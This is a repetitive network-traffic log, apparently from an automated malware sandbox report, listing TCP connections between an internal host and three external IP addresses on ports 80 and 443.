                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49161
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.216.183.13:80
                  Source: global trafficTCP traffic: 41.216.183.13:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.216.183.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.216.183.13:80
                  Source: global trafficTCP traffic: 41.216.183.13:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 41.216.183.13:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 41.216.183.13:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 41.216.183.13:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.216.183.13:80
                  Source: global trafficTCP traffic: 41.216.183.13:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 41.216.183.13:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.216.183.13:80
                  Source: global trafficTCP traffic: 192.168.2.22:49161 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 188.114.96.3:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.243.156:80
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.3.243.156:80 -> 192.168.2.22:49164
